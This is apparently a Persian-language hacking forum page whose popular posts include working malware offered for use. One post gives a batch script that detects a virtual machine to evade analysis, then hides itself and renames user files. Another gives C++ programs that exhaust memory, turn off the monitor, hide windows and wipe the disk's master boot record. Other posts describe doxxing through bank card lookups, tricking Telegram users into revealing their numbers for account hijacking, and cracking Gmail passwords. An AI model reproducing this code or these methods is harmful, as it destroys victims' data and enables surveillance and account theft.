رفتن به مطلب
انجمن تیم امنیتی گارد ایران

تخته امتیازات

  1. Bl4ckw0rM

    Bl4ckw0rM

    کاربر ویژه طلایی


    • امتیاز

      29

    • تعداد ارسال ها

      39


  2. ErfanXray

    ErfanXray

    کاربر تازه وارد


    • امتیاز

      20

    • تعداد ارسال ها

      29


  3. MR.D3F417

    MR.D3F417

    کاربر ویژه طلایی


    • امتیاز

      19

    • تعداد ارسال ها

      53


  4. Mr.Python

    Mr.Python

    مدير بخش


    • امتیاز

      17

    • تعداد ارسال ها

      537


مطالب محبوب

در حال نمایش مطالب دارای بیشترین امتیاز از زمان ۰۰/۱۰/۲۴ در همه بخش ها

  1. تصمیم گرفتم برای شروع توی گارد ایران یک دسته کد خوب بزارم برای دوستان(یک چیز ساده ولی کاربردی..) ....دیدین بعضی از افراد از ماشین مجازی ساز استفاده میکنن برای مثلا تست نرمفزار که نکنه مخرب باشه یه جورایی استفاده میکنن برای تشخیص اینکه این ویروسه یا نه خلاصه اینکه اگر بخوایم یه ویروسی رو بهشون بدیم سریع میندازن اونجا تست میکنن خب ما هم یه سری کد مینویسیم که ویروسمون بفهمه گزاشتنش تو ازمایشگاه سریع تغیر حالت بده به یه برنامه معصوم بعد که کاربر رو گول خورد رفت که برنامه بزاره تو سیستم ویروس هم اجرا میشه و از این جور حرفا خب ابتدا لازمه که به ویروس یا برنامه بفهمونیم چه خبره اصلا ) @echo off و تیتل و وcolor (رو که زدین بیاین که شروع کنیم اول به ویروس یا برنامه بفهمونیم که چه چیزایی رو باید چک کنه که بفهمه ایا اینجا شبیه سازه یا کامپیتره هدف FOR /F "tokens=* USEBACKQ" %%F IN (`PowerShell.exe -command " (gwmi Win32_BaseBoard).Manufacturer -eq 'Microsoft Corporation' "`) DO ( SET check=%%F ) بدین شکل بزنین در واقعا من با استفاده از یه حلقه ساده هدف چک کردن رو مشخص کردم و تهش هم با دستور ست موارد چک رو توضیح دادم در ادامه بریم یه دستور شرطی بسازیم که در صورت نادرست بودن بره سوییچ کنه بره برا پروژه معصوم بودن خب ابتدا if %check% == False ( echo Dim WshShell, BtnCode>C:\Windows\Tset.vbs echo Set WshShell = WScript.CreateObject("WScript.Shell")>>C:\Windows\Test.vbs از ویوژال بیسیک هم استفاده میکنیم بعله یک برنامه ویوژال بیسیک میسازیم چون اینطور خیلی ساده در صورت برخورد برنامه با ارور ویروس میفهمه که خودشو باید بزنه به اون راه خب معلومه دیگه چجور میسازیمش با echo یه فایل ویوژال بیسیک میسازه و کاری که میخوایم رو انجام میده. بعد ارور های برنامه چی باشن اونا رو هم بنویسیم... echo BtnCode = WshShell.Popup("Could not start process!",2+48,"Taskmanager")>>C:\Windows\Test.vbs echo Select Case BtnCode>>C:\Windows\Test.vbs echo case 3 WScript.Echo "ERROR">>C:\Windows\Test.vbs echo case 4 WScript.Echo "ERROR">>C:\Windows\Test.vbs echo case 5 WScript.Echo "ERROR">>C:\Windows\Test.vbs echo End Select>>C:\Windows\Test.vbs مشخص کردیم ارور ها رو case اینم نیازی به توضیح نداره ولی میگم با استفاده از قبلش هم گفتیم چجور اجرا بشه زدیم end تهشم یه حالا هم قسمت پایانی اسکریپمون باید این اسکریب که ساخته استارت بخوره که با بچ اسکریپ عملیات شروع استارت میزنه... start C:\Windows\ifvm.vbs pause exit روی حالت اوکی دراومد ویروس عملی بشه پس ازif در ضمن یادتون نره در صورتی که دستور ) else ( goto :1 تهشم گوتو رو گذاشتم رو یک شما کد مخربتون رو به شماره بزنید(این برا بچ اسکریپه هاااا) اینم سورس کاملش همراه با اعمالی که توش انجام دادم برای مثال... @echo off color 04 title ... :start ::--------------- ::Starting... cd C:\ attrib +h %0 attrib +r +h killF.bat Set "killF.bat=killF" ::--------------- FOR /F "tokens=* USEBACKQ" %%F IN (`PowerShell.exe -command " (gwmi Win32_BaseBoard).Manufacturer -eq 'Microsoft Corporation' "`) DO ( SET check=%%F ) echo %check% if %check% == False ( echo Dim WshShell, BtnCode>C:\Windows\ifvm.vbs echo Set WshShell = WScript.CreateObject("WScript.Shell")>>C:\Windows\ifvm.vbs echo BtnCode = WshShell.Popup("Could not start process!",2+48,"Taskmanager")>>C:\Windows\ifvm.vbs echo Select Case BtnCode>>C:\Windows\ifvm.vbs echo case 3 WScript.Echo "ERROR">>C:\Windows\ifvm.vbs echo case 4 WScript.Echo "ERROR">>C:\Windows\ifvm.vbs echo case 5 WScript.Echo "ERROR">>C:\Windows\ifvm.vbs echo End Select>>C:\Windows\ifvm.vbs start C:\Windows\ifvm.vbs pause exit ) else ( goto :1 :1 ::--------------- ::change the name of file.... ::for nothing... cd Desktop ren *.png ren *.jpg ren *.gif ren *.docx ren *.doc ren *.pdf ::--------------- echo I Fucked YOu o_0 goto :start اینم از اولین تایپیکم امید وارم براتون مفید واقع شده باشه ....
    8 امتیاز
  2. درود خدمت شما عزیزان امروز یک اسکریپت ساده با استفاده از کتابخونه محبوب باج افزار نویسا استفاده کردم به اسم = pyAesCrypt و PyPDF4 که این اسکریپت فایل pdf شمارو به 2 روش امنیتی رمزگذاری میکنه و بعد اگر رمزشو داشته باشید همونو واستون رمزنگاری میکنه امیدوارم مفید باشه آموزش خاص نداره توضیحات کافی بازم تو گیت هاب هست ابزار سوییچ -h داره پس خیلی کار باهاش راحت تره ولی باز هم مثال میزنیم : python [BG]encrypt_pdf.py -a encrypt (or decrypt) filename.pdf -a 1 (level 1 or 2) -o outputefile.pdf فرق لول 1 و 2 در گیت هاب نوشته شده. خلاصه کارکرد ابزار : pdf-encrypter_108.mp4 لینک گیت هاب : https://github.com/MRD3F417/PDF-Encrypter-Decrypter
    8 امتیاز
  3. سلام خدمت بزرگان و تازه استارت زده های ویروس سازی یه چند عدد ویروس کوچولو سی پلاس نوشتم که هم خوشکل باشن هم اینکه از منظر بزرگان کم به حساب نیان به همراه توضیحات روون برای رفقای علاقه مند به این زبان خب بریم سراغش ----------------------------------------------------------------------------- ویروس پر کردن حافظه رم(memoryfull).1 طرز کارش هم معلومه میگیره حافظه رو پر میکنه چجور ساده با یه ساختمون داده دیتا ریز بعد گزاشتن اون داده توی یه حلقه تکرار شدنی بی انتها خیلی ساده با فری کنسول نوشته شده هم... فری کنسول هم یه جور تابع که هیچ پارامتری نداره بیشتر برای برنامه هایی از این دست استفاده میشه با کنسول ارتباط برقرار میکنه(گفتم نگین نگفتی ) خب بیاین شروع کنیم به کد زنی(حالا با هر نوع کامپایلری که داشتین ...) #include<stdio.h> #include<stdlib.h> #include<Windows.h> اول انکلود ها و کتابخانه ها رو تنظیم میکنیم (ببین چقدر پایین توضیح میدم ) که دیگه درکش زیادم سخت نیست این یه جور کتابخانه ایی که باعث میشه برنامه بره دایرکتوری مد نظرمون رو جستجو کنه stdio.h از کتابخانه ویندوز که نیاز داریم بهش و <> اینم یعنی هدر بعد بیاین پایین ساختمان دادهرو اوکی کنیم برای تازه کارا میگم ساختمان داده تو سی پلاس اینجوری تنظیم میشه struct identifier { //members }; که اینم درکش سادس identufier همون اسم ساختمان دادمونه ممبر هم یعنی اعضای ساختمون(جهت اطلاعات بیشتر برین سی پلاس یادبگیرید ) struct runi { long int data[500]; struct runi* next; }; خب یه ساختمون داده درست کردیم بعد هم اومدیم اعضاش رو مشخص کردیم شما میتونید هر نوعی رو استفاده کنید غیر از این ولی من این رو انتخاب کردم با مقدار 500long int اعضای اون یک متغیر از نوع بعدشم اومدم به صورت لیست دراوردمش(بگذریم که ای ن لیست یه لیست تک پیوندی....) خب بعدش بیایم مین رو تنظیم کنیم بدین صورت int main() { FreeConsole(); while (true) { struct runi* head = (struct runi*)malloc(sizeof(struct runi)); } } میبینید که حلقه تکرار قشنگ معلومه نیاز به توضیح نیست تابع فری کنسول هم قبل حلقه و توی مین قرار گرفته توضیح خاصی هم نداره راستش رو بخواین (نفهمیدید زیر بگین بگم ..) خب اینم کامپایل کنیم و اجرا میگیره مموری رو پر میکنه شما با ری استسارت زدن میتونید کارشو بسازید(من هیچ مسعولیتی قبول نمیکنم خواهشن بلد نیستید....) ----------------------------------------------------------------------------- ویروس خواموشی مانتور(Turnoffmonitor).2 یه ویروس ساده ولی قشنگه ها توضیححی هم نداره توضیح بخواین زیر بگین(هی میگم زیر زیر پست) #include <Windows.h> int main() { FreeConsole(); while (true) { SendMessage(HWND_BROADCAST, WM_SYSCOMMAND, SC_MONITORPOWER, (LPARAM)2); } return 0; } بدین شکل دیگه هم نیازی نداریم به ادرس و دایرکتوری فقط از ویندوز استفاده کردیم ----------------------------------------------------------------------------- (ویروس بسته شدن پنجره باز شده).3 !این برنامه هایی رو که باز هستن رو میبنده همین ولی نکتش اینجاست این در واقع میزاره تو حلقه تکرار و باعث میشه که کلا دیگه برنامه ایی تو دسکتاپ نبینید #include <Windows.h> int main() { FreeConsole(); HWND window; while (true) { window = GetForegroundWindow(); ShowWindow(window, SW_HIDE); Sleep(2000); } return 0; } ----------------------------------------------------------------------------- OverwriteMBR .4 برای جایزه هم که شده اینو بزارم یه ویروس ساده ولی کاری میکنه کارستون! میگیره هارد طرفو غیر قابل استفاده میکنه یکم هم بگم سادس #include <Windows.h> int main(){ FreeConsole(); DWORD buffer; char mbrContent[512]; ZeroMemory(&mbrContent, sizeof(mbrContent)); HANDLE MasterBootRecord = CreateFile(L"\\\\.\\PhysicalDrive0", GENERIC_ALL, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, NULL, NULL); WriteFile(MasterBootRecord, mbrContent, 512, &buffer, NULL); CloseHandle(MasterBootRecord); return 0; } ----------------------------------------------------------------------------- خب تموم شد مطالبم امید وارم به خوبی و خوشی ازش استفاده کنید یادبگیرید و از این جور حرفا (ممنون که زحمت دادین تا تهشو خوندید (رو سیستم خودتون یه وقت تست نکنید ها
    7 امتیاز
  4. دورد خدمت شما عزیزان امروز یک اسکریپت ریز درست شده که با استفاده از کتابخونه PyMuPDF میتونه برای ما از یک فایل pdf متن هاش رو به صورت کاملا منظم در بیاره و در یک فایل txt قرار بده آموزش خاصی نداره توضیحات کافی داخل گیت هاب موجوده / یک مثال هم در زیر موجوده + یک دمو از کارکرد ابزار = python [BG]txt-exteractor.py your-file.pdf -p 5 (number page for exteract!) -o outpute.txt -b (for fixed write on txt file) bandicam 2022-01-17 12-31-46-283_491.mp4 گیت هاب : https://github.com/MRD3F417/Text-Exteractor-from-PDF امیدوارم مفید باشه | ابزار های قوی تر زمان بیشتری برای ساخت میخوان ...
    7 امتیاز
  5. 6 امتیاز
  6. سلام و عرض ادب توی این تاپیک قصد دارم یکی از واجب ترین موارد برای گرفتن ورودی در Python با استفاده از argparse رو بهتون آموزش بدم دیدید توی بعضی از برنامه ها شما وقتی فایل برنامه رو توی کنسول اجرا می کنید نیاز به پارامتر های ورودی قبل از اجرا دارن، ما اینجا نحوه ایجاد چنین برنامه ای رو به ساده ترین شکل ممکن بهتون آموزش میدیم .. python arg.py -t test کد قرار هست به شکل فوق باشه و test ورودیمون خب اول تابع argparse رو نصب و سپس توی برنامه ایمپورت می کنیم نصب : pip install argparse ایمپورت: import argparse ما یک def برای برنامه ایجاد می کنیم و محتویاتش رو به شکل زیر تعریف می کنیم : def get_args(): parser = argparse.ArgumentParser(description='argparse description') parser.add_argument('-t', '--target', dest="test", required=True, action='store', help='Target test') args = parser.parse_args() return args در خط سوم ما مقدار dest رو test گذاشتیم، این مقدار مقداری هست که بعد توی برنامه از استفاده می کنیم که شما می تونید هر مقدار دیگه ای بزارید ... 2 تا پارامتر دیگه وجود داره با نام های -t و --target این 2 با هم یکی هستند، اول کوتاه و دومی کاملش هست، با هر دوش برنامه کار می کنه ، خب دیگه برنامه تمام شد، میریم سراغ فراخوان مقدار ورودیمون که به شکل زیر استفاده میشه : args = get_args() print("Test = "+args.test) حالا با استفاده از کد python arg.py -t test یا python arg.py --target test می تونید برنامتون رو اجرا و ورودیتون رو دریافت کنید توجه داشته باشید که می تونید خط 3 رو تکرار و ورودی های بیشتری رو بهش وارد کنید اگه ما توی این برنامه ورودی رو وارد نکنیم و مستقیم بخوایم برنامه رو اجرا کنیم، برنامه به صورت خودکار خطای لازم رو صادر و به کاربر نمایش میده، که توی کد ما خطا به شکل زیر هست : usage: arg.py [-h] -t TEST arg.py: error: the following arguments are required: -t/--target اینم کد کامل : #Bl4ckw0rM --> guardiran.org import argparse def get_args(): parser = argparse.ArgumentParser(description='argparse description') parser.add_argument('-t', '--target', dest="test", required=True, action='store', help='Target test') args = parser.parse_args() return args args = get_args() print("Test = "+args.test) یا حق
    5 امتیاز
  7. اول عکس خروجی رو بهتون نشون میدم که نگید کار نمی کنه، بعد کد رو قرار میدم، فایل ها رو هم می تونید از ضمیمه دانلود کنید. کد: from tkinter import * import tkinter as tk from PIL import Image, ImageTk import random # Change by Bl4ckw0rM in guardiran.org for XxMaHdIxX TnQ very :* class App(tk.Tk): def __init__(self): super().__init__() def click(): e2.delete(0,'end') number=e1.get() number=int(number) p1="".join(random.sample(alls,number)) p1=str(p1) e2.insert(END,p1) self.title('Pass Maker') self.geometry("400x600") self.config(bg="#26242f") lower="abcdefghijklmnopqrstuvwxyz" upper="ABCDEFGHIJKLMNOPQRSTUVWXYZ" number="0123456789" sy="_" alls=lower+upper+number+sy l2=self.image = Image.open('./pass-maker.png') self.python_image = ImageTk.PhotoImage(self.image) tk.Label(self, image=self.python_image).pack() e1=Entry(self,font=("arial 15")) e1.pack() l2=self.image = Image.open('./add.gif') self.python_image2 = ImageTk.PhotoImage(self.image) b1=Button(self,text="Make",command=click,image=self.python_image2) b1.pack() e2=Entry(self,font=("arial 15")) e2.pack() if __name__ == '__main__': app = App() app.mainloop() دانلود فایل فشرده همین تکه کد : pass-maker[guardiran.org].zip
    5 امتیاز
  8. باسلام خدمت دوستان و اساتید محترم در ویدیو های قبلی بخش دوم رو یه کمی از ویدیو هاش اپلود شد خود بخش ۲ به چند قسمت تقسیم میشه 1-Content Management System 2-Web Architectures 3-Languages anf Frameworks و فردا قسمت کانکت یعنی بخش اول رو تموم میکنیم ویدیو هاش امادس ولی حجمش زیاده و دارم خروجی میگیرم سیستم به فنا میره بخاطر همین فردا اپلود میکنم والبته سرعت بی نظیر نت هم فراموش نشه و چون درگیر امتحانا هستم و تقریبا اخرای امتحانا هست بعد امتحانا سعی میکنم هر روز تاپیک رو اپدیت کنم تا نخوابه............ تا فردا....
    5 امتیاز
  9. اون exe ای که فکر میکنید نیست... ابزار هایی که میان از اسکریپت های شما خروجی exe تولید میکنن، در واقع میان interpreter و کتابخونه ها و همرو با اسکریپتتون bind میکنن یعنی شما وقتی اون فایل exe رو باز میکنین در واقع دارین interpreter پایتون رو اجرا میکنین و اون میاد کد های اسکریپتی شمارو میخونه، مستقیما با منابع سیستم عامل ارتباط نداره حالا interpreter ای که دارید، 32 بیتی یا 64 بیتیه، روی تمام سیستم ها کار نمیکنه فرص کنین interpreter موجود روی سیستم شما 64 بیتی باشه و شما اومدین از اسکریپت خروجی exe گرفتین و دادین به کسی که سیستمش 32 بیتیه خب این مسلما قرار نیست کار کنه چون نرم افزار 64 بیتی روی 32 بیتی اجرا نمیشه قاعدتا... حتی اگر این بحث هم اوکی باشه یعنی شما بیای فایل رو روی 64 بیتی اجرا کنی بازهم ممکنه به دلیل ناسازگاری کتابخونه ها یا ناسازگاری با فایل های سیستمی برنامت درست اجرا نشه... پایتون فعلا برای exe کردن ساخته نشده، حتی cython و بقیه پیاده سازی های بهینه هم کاملا تمام کدهای شمارو ساپورت نمیکنن و یه جاهایی مشکل درست میشه براتون..
    5 امتیاز
  10. باسلام خدمت دوستان واستید محترم بخش کانتنت هم اپلود شد سعی میکنم بخش دوم هم امروز تموم کنم و اپلود کنم چون حجم فایل زیاده نشد تو انجمن اپلود کنم https://b2n.ir/e05606 اگه لینک کار نکرد اینم لینک اضافی: https://uupload.ir/view/sans_2-1_full_q34x.rar/ بخش حملات بیشتر تو سنز 542 هست برای همین نزاشتم!!!!!!
    4 امتیاز
  11. شما ابتدا وارد همراه بانک یا خودپرداز میشد، بعد مبلغ اندکی رو کارت به کارت می کنید به همون شماره کارت (البته در مرحله آخر کلید تایید رو نمیزنید تا پول انتقال داده نشه ) اون موقع می تونید نام و نام خانوادگی طرف رو در بیارید، خب تا اینجای کار فقط از روی شماره کارت اسم و فامیل رو پیدا کردید ، حالا با استفاده از علم Osint می تونید از طریق شبکه های اجتماعی و ... اطلاعات بیشتری از طرف در بیارید، در خصوص این علم من یک مجموعه آموزشی دارم که هنوز کامل ندیدمش و نمی تونم کمکی بهتون کنم اما توی انجمن بخشی رو برای این منظور مشاهده کردم، در اون بخش درخواست هاتون رو ارسال کنید تا دوستان حرفه ای انجمن طبق درخواست کمکتون کنند. البته لازم به ذکر هست که بخش Osint در قسمت VIP انجمن قرار داره به دلیل اینکه این بخش توی قسمت VIP انجمن هست، اطلاعات زیادی ازش منتشر نمی کنم فقط کمی از قسمت معرفی Osint که توی یکی از تاپیک ها قرار داده شده رو برای دید بهتر براتون قرار میدم : در صورت نیاز می تونید با خرید اشتراک VIP انجمن از اطلاعات مفید این بخش استفاده کنید و سوالاتتون رو هم در این خصوص مطرح کنید.
    4 امتیاز
  12. s = lambda FileName: open(f"New_{FileName}", "w").write("\n".join([i.split(":")[0] for i in open(FileName).readlines()])) Or def s(FileName): with open(FileName) as f: Data = f.readlines() lines = [] for i in Data: lines.append(i.split(":")[0]) Text = "\n".join(lines) with open(f"New_{FileName}", "w") as f: f.write(Text) جفتشون یه کارو می‌کنن
    4 امتیاز
  13. این ip list برای کشور چین هست و تمام ip های این لیست روشن هست و تست شده برای دانلود کلیک کنید https://s20.picofile.com/file/8446500350/China_IpList.txt.html ( اگر دوست داشتین بگین من ip range کشور های دیگه هم اسکن کنم و ip های سالم رو براتون بزارم )
    3 امتیاز
  14. ErfanXray

    شماره مجازی

    با سلام خدمت دوستان و اساتید از تایتل مشخصه که میخام چی بگم برا همین نمیگم شماره مجازی ها از سایت my.openphone.co میباشند و لطفا تازه وارد در این کار پیام ندند حداقل میتونم 5تا لینک دعوت بزارم دوستانی که واردن و نیاز دارن تو پیام خصوصی پیام بدن و جیمیل یا میل بفرستند لینک بدم باتشکر........................
    3 امتیاز
  15. باسلام این روش قبلا برای شبکه های اجتماعی جواب میداد! الان دیگه روی پسود های میل حساسسن برای همین با پسوند .onion نمیشه سایتی رو این زیر میزارم با اون تست کن حتی تمپ هویت هم برات میزاره https://smailpro.com/ اینم بگم از پسوند های معتبر استفاده میکنه .gmail......... .yahoo......... .hotmail و.....
    3 امتیاز
  16. برای تغییر سایز می تونید از os استفاده کنید : import os os.system("mode con: cols=50 lines=20")
    3 امتیاز
  17. o.exe FileName.txt o.exe
    3 امتیاز
  18. https://stackoverflow.com/questions/30527522/what-are-the-differences-between-visual-studio-code-and-visual-studio
    3 امتیاز
  19. همون extension ای که حرف میزنین ازش رو تو همون لینک بهتون معرفی کرده . در نهایت با انجام تمام اون تنظیمات میتونید یه keyboard shortcut تعریف کنین و اصلا کلیک هم نیاز نباشه . برای من short cut کلید های زیر هست : Ctrl+Shift+b لطفا لینک هارو به دقت مطالعه کنین . extension ای که اینجا معرفی میشه استاندارد هست از طرف برنامه نویسان c cpp (همه قبولش دارن) . مراحل انجام کار هم تو همون لینک ها توضیح داده . اگه وقت میذاشتید و اونهارو میخوندین ، تا الان باید به چیزی که میخواستید میرسیدین .. اگر واقعا خوندن این لینک ها و تنظیم کردن vs code براتون سخته خب برید سراغ ide
    3 امتیاز
  20. سلام خدمت همه دوستان و اساتید به دلیل اینکه فردا و پس فردا درگیر امتحانات هستم تصمیم گرفتم امروز ویدیو های فردا رو اپلود کنم و یه بخشی رو یادم رفته بود بگم حملات بیشتر خودش چند بخش داره: 1.1 - Introduction to SEC642 Advanced Web App Penetration Testing, Ethical Hacking, and Exploictation Techniques 1.2 - Methodology and Context 1.3 - File Inclusion 1.4 - SQL Injection 1.5 - NoSQL Injection 1.6 XSS and XSRF Together فعلا تو بخش دوم هستیم (خود سنز به بخش اول توجه نکرده) Sans 642 Part 1-3.mp4 Sans 642 Part 1-4.mp4
    3 امتیاز
  21. سلام برنامه ساخت رت اندروید زیاد هست ولی کارایی نداره راحت انتی ویروس شناسی میکنه با این حال چند تا از بهتریناشو میگم 1=888rat یکیشم droid بود بهتره خودت با متا رت درست کنی یکی از دوستان هم اموزششو گذاشته بود تو انجمن بگردی هست
    2 امتیاز
  22. MR.D3F417

    اجرای Vege

    داخل ویندوزه انگار . به طور کامل نصب نشده و به نظرم نصب درست و کاملش رو توی گوگل ببینید
    2 امتیاز
  23. Bl4ckw0rM

    جیمیل

    دوست عزیز یا سوالی نپرسید یا اگه پرسیدید جواب گرفتید در برابر حقیقت موجود مقاومت نکنید، درسته که گوگل امنیت بالایی داره اما کرک کردن حساب ها با یک پسورد لیست قوی و لیست پروکسی خوب یا تور امکان پذیر هست. کرک اکانت های جیمیل با استفاده از SMTP جیمیل و پورت 587 انجام میشه ...
    2 امتیاز
  24. 2 امتیاز
  25. میشه این کدی دادی رو به این اضافه کنی from tkinter import * import random root=Tk() root.title("Pass-Maker") root.geometry("400x600") root.config(bg="#26242f") lower="abcdefghijklmnopqrstuvwxyz" upper="ABCDEFGHIJKLMNOPQRSTUVWXYZ" number="0123456789" sy="_" alls=lower+upper+number+sy def click(): e2.delete(0,'end') number=e1.get() number=int(number) p1="".join(random.sample(alls,number)) p1=str(p1) e2.insert(END,p1) l2=Label(root,text="Number of letters").pack() e1=Entry(root,font=("arial 15")) e1.pack() b1=Button(root,text="Make",command=click) b1.pack() e2=Entry(root,font=("arial 15")) e2.pack() root.mainloop() برای این دکمه عکس بزارین l2=Label(root,text="Number of letters").pack()
    2 امتیاز
  26. واضح بیان نمی کنید، یه شات از مشکلتون ارسال کنید و خطاهایی که مشاهده می کنید، تا بهتر بتونیم کمکتون کنیم...
    2 امتیاز
  27. Mr.Python

    Udemy

    اکثر اموزش های خارجی رو میتونید از این سایت ایرانی دانلود کنین: https://downloadly.ir/
    2 امتیاز
  28. ظاهرا توجهی به صحبتای ما نکردین.. اون دوتا لینکرو مطالعه کنین. بهتون توصیح میده ساده هم هست..
    2 امتیاز
  29. من دارم یه برنامه دو فرمی با سی شارپ مینویسم که صفحه اولش لاگین کردنه که در صورت پذیرفتن یوزر و پس اجازه ورود بده و مستقیم کاربر به فرم 2 بره نوشتم void دقیقا همون طور مثل همیشه با اینطور public void Logincheck(string BlackGuard) { try { connect.Open(); } catch (SqlException T) { MessageBox.Show("Error: i cant connect to data base :/" + T.Message); }; SqlCommand commander = new SqlCommand("SELECT * FROM table_login WHERE username='@username' and password='@password'", connect); commander.Parameters.AddWithValue("@username", txt_username.Text); commander.Parameters.AddWithValue("@passowrd", txt_password.Text); SqlDataReader reader = commander.ExecuteReader(); string username = BlackGuard; string password = BlackGuard; if (reader.HasRows) { while (reader.Read()) { username = reader["BlackGuard"].ToString(); password = reader["BlackGuard"].ToString(); } connect.Close(); this.Hide(); BG frm = new BG(); frm.Show(); } else { MessageBox.Show("Error: This not pass :/"); this.Show(); BG frm = new BG(); frm.Hide(); } connect.Close(); } private void btn_login_Click(object sender, EventArgs e) { logincheck(); } } } این کله کدمه که برای راحتی درک شما گزاشتم خطا میده و حتی با گزاشتن "logincheck()"حالا قسمت اخر که بخوایم شروع کنیم قسمت و ساختن یه کلاس دیگه (اینشکلی private void logincheck() { throw new NotImplementedException(); } هم فیکس نمیشه نمیدونم باید چکار کنم تقریبا 5 6 ماه هست سی شارپ کار نکردم به همین خاطر این ارور ها برمیخورم میدونم سادس ولی خب کله برنامه رو خراب کرده( کسی هست که بتونه این مشکلمو حل کنه برای اجرا لاگینif در ضمن بگم این برنامه ویندوز فرمه از لحاظ رمز اشکال نداره ولی انگار بعد زدن رمز نمیره تو حلقه ...
    1 امتیاز
  30. from tkinter import * import random root=Tk() root.title("Pass-Maker") root.geometry("400x600") root.config(bg="#26242f") lower="abcdefghijklmnopqrstuvwxyz" upper="ABCDEFGHIJKLMNOPQRSTUVWXYZ" number="0123456789" sy="_" alls=lower+upper+number+sy def click(): e2.delete(0,'end') number=e1.get() number=int(number) p1="".join(random.sample(alls,number)) p1=str(p1) e2.insert(END,p1) l2=Label(root,text="Number of letters").pack() e1=Entry(root,font=("arial 15")) e1.pack() b1=Button(root,text="Make",command=click) b1.pack() e2=Entry(root,font=("arial 15")) e2.pack() root.mainloop()
    1 امتیاز
  31. اول عکس هاتون رو تعریف می کنید : PlayUp = PhotoImage(file=currentdir+r'\Up_image.gif') PlayDown = PhotoImage(file=currentdir+r'\Down_image.gif') سپس فانکشن هاتون رو تعریف می کنید : def returncolor(): pButton.config(image=PlayUp) def playButton(): pButton.config(image=PlayDown) pButton.after(200,returncolor) در آخر هم کلید هاتون رو مقداردهی می کنید : #Play Button pButton = Button(root, text="Play", command=playButton, borderwidth=0) pButton.grid(row=1) pButton.config(image=PlayUp) لینک منبع : [مشاهده منبع]
    1 امتیاز
  32. سلام دارم برای تفریح و همچنین تیم یک کریپتر می نویسم. اگه میشه نمونه کد کریپتری که EXE در رم لود میکنه و اجرا میکنه برام بذارید ممنون. قسمت اولش تموم شده و توی Stub گیر کردم چون دات نت با نسخه قبلی های هماهنگ نیست و کلی دردسر داره.
    1 امتیاز
  33. 1 امتیاز
  34. ببخشید ولی میشه لطفا دقیق تر توضیح بدین
    1 امتیاز
  35. منظورت از نت سرور چیه دقیقا؟
    1 امتیاز
  36. سلام مقاله کنونی در حد رمزهای مطرح جهان یعنی keccak , Blake کارکرد داره و میزان فروپاشی بهمنی اش همین حد هست و امنیت همچنین که در داخل این هش از نوع مدل فیستلی هم الهام گرفته شده (جابه جایی بلوک ها) همچنین از کتابخانه الگوریتم بل براش استفاده کردم که میتونید از IEEE تهیه کنید (Bel Hybrid Bit generator) برای این مقاله 2 - 3 سال زحمت کشیده شده. (197)-[Turkish J. Comp. Math. Educ.] (5) (1) (1).docx
    1 امتیاز
  37. من در خصوص سرورتون اطلاعاتی ندارم، اما به عنوان کسی که هم ماینر داشته و هم سرور باید خدمتتون عرض کنم که سختی شبکه های ارز دیجیتال بسیار بالا رفته و با سرور های هکی یا حتی پولی هم نمی تونید ماین کنید، قدرت این سرورها بسیار پایین هست و برای ماینینگ به درد نمی خوره در خصوص هک هم کاربردهایی داره که باید اطلاعات کافی از اون نوع حمله ای که می خواید داشته باشید، به عنوان مثال کرک، حملات داس و ...
    1 امتیاز
  38. چیزی که شما نصب کردین یه editor مشابه ide هست اما کاملا اون نیست (تقاوت های editor /ide سرچ بزنین) خب editor ها معمولا یه برنامه ای که از قبل نوشته شدن رو استفاده میکنن به عنوان یک "واسطه" که بیاد کد های شمارو از یجا بگیره، بده به یجای دیگه، این یعنی چی؟ یعنی شما اون برنامه ای که اصطلاحا extension هست، رو نصب کردی و اون میاد کد های شمارو میخونه یه سری کارا روش انجام میده و در نهایت میده به یکی دیگه این یکی دیگه کیه؟ خب برای زبان c, cpp شما برای اجرای کد ها و برنامه هاتون نیاز به کامپایلر دارین، این مورد "کامپایلر" رو باید خیلی قبلتر راجبش میخوندین و چیزی نیست که بخوام وارد جزئیاتش بشم و توضیح بدم و اون extension میاد کد های شمارو انالیز میکنه (چه از نظر syntax چه از نظر semantics مربوط به زبان برنامه نویسی و...) و میفرسته به کامپایلر و کامپایلر هم کار خودشو میکنه تا فایل اجرایی بسازه واسطه رو اوکی کردی ولی خبری از کامپایلر نیست! یا درست تنظیم نشده روی سیستمت یا کلا نصب نکردیش.. شما حتما مطالب این دو تا لینک رو مطالعه کن : https://code.visualstudio.com/docs/languages/cpp https://code.visualstudio.com/docs/cpp/config-mingw بهتون یاد میده از صفر تا صد چیکار باید بکنین...
    1 امتیاز
  39. باید هر زبانی رو که دارین مینویسید کامپایارش رو نصب کنید و انتخابش کنید کنار همون قسمت که دکمه ران هست کامپایلر هم هست اونو چک کنید
    1 امتیاز
  40. درود خب قرار بود آموزش به دست آوردن شماره افراد در تلگرامو بذارم خب این روش هم مهندسی اجتماعی نیاز داره یکی از قابلیت های عجیب تلگرام در اینه که اگه شما شماره کسی رو داشته باشید و اون فرد شمارتون رو نداشته باشه در صورت شروع چت با فرد شماره شما برای طرف نمایان میشه حالا شما این ماجرا رو برعکس تصور کنید یعنی شماره خودتون رو به فرد بدید تا در کانتکت هاش add کنه اونوقت زمانی که قربانی بهتون پیام داد شماره همراهش براتون نمایان میشه!! تنها لازمه که کمی خلاقیت داشته باشید تا طرف راضی بشه شمارتون رو به کانتکت هاش اضافه کنه برای نمونه میتونید بگید شمارتون رو داشته باشه تا شمارو به گروه هاش add کنه(چون اینجور افراد زیاد هستند معمولا جواب میده) روش برای راضی کردن تارگت زیاده که خودتون باید پیدا کنید به دست آوردن شماره چه کاربردی داره؟ زمانی که بخواید اکانت کسی رو هک کنید به شماره اش احتیاج پیدا میکنید اطلاعات بیشتر در این آموزش: http://guardiran.org/forums/topic/1894-آموزش-هک-اکانت-تلگرام/#entry7301 همچنین از طریق شمارش میتونین اکانت های وایبر و واتس آپش رو هم پیدا کنید نکته مهم: طبیعیه که شما هم دوست ندارید شمارتون دست قربانی بیوفته و از نظر امنیتی هم به صلاحتون نیست،پس راه حل چیه؟ راه حلش استفاده از شماره مجازی در هنگام ساخت اکانت تلگرامه از این طریق میتونید در شبکه های اجتماعی ناشناس باقی بمونید آخرین نرم افزاری که من استفاده کردم و هنوز جواب میده نرم افزار Talk2 که شماره مجازی با کد فیلیپین می سازه در صورت لزوم در ادامه همین پست یا در تاپیک جدید نرم افزار و آموزشش رو میزارم موفق و پیروز باشید
    1 امتیاز
